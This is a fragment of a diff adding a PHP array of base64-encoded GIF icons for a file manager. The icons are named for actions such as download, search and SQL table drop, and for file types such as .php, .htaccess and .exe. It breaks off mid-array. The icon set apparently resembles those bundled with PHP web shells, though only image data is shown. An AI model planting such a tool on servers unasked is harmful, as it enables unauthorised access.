+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7",
+"download"=>
+"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
+"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
+"forward"=>
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
+"WqsJADs=",
+"home"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
+"mode"=>
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
+"refresh"=>
+"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA".
+"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY".
+"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ".
+"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=",
+"search"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
+"setup"=>
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
+"small_dir"=>
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
+"small_unk"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".
+"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31".
+"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".
+"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".
+"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".
+"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".
+"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".
+"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".
+"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".
+"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".
+"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".
+"yAsokBkQADs=",
+"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR".
+"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==",
+"sort_asc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
+"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
+"sort_desc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
+"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
+"sql_button_drop"=>
+"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".
+"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/".
+"AQEAOw==",
+"sql_button_empty"=>
+"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA".
+"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==",
+"sql_button_insert"=>
+"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA".
+"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=",
+"up"=>
+"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg".
+"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV".
+"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==",
+"write"=>
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
+"ext_asp"=>
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
+"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
+"ext_mp3"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+"ext_avi"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM".
+"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4".
+"PYXCyg+V2i44XeRmSfYqsGhAAgA7",
+"ext_cgi"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9".
+"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6".
+"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S".
+"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ".
+"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM".
+"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD".
+"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi".
+"RYtMAgEAOw==",
+"ext_cmd"=>
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
+"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
+"dmrYAMn1onq/YKpjvEgAADs=",
+"ext_cpp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".
+"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".
+"Eq7YrLDE7a4SADs=",
+"ext_ini"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
+"SnEjgPVarHEHgrB43JvszsQEADs=",
+"ext_diz"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".
+"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".
+"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".
+"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".
+"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".
+"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".
+"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".
+"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".
+"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".
+"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".
+"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".
+"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".
+"Ow==",
+"ext_doc"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR".
+"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq".
+"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=",
+"ext_exe"=>
+"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
+"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
+"xhIAOw==",
+"ext_h"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".
+"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".
+"Wq/NknbbSgAAOw==",
+"ext_hpp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".
+"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".
+"UqUagnbLdZa+YFcCADs=",
+"ext_htaccess"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
+"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
+"AAA7",
+"ext_html"=>
+"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
+"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
+"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
+"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
+"ADs=",
+"ext_jpg"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_js"=>
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
+"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
+"a00AjYYBbc/o9HjNniUAADs=",
+"ext_lnk"=>
+"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".
+"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".
+"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".
+"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".
+"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".
+"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
+"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
+"ADs=",
+"ext_log"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
+"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
+"ext_php"=>
+"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg".
+"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==",
+"ext_pl"=>
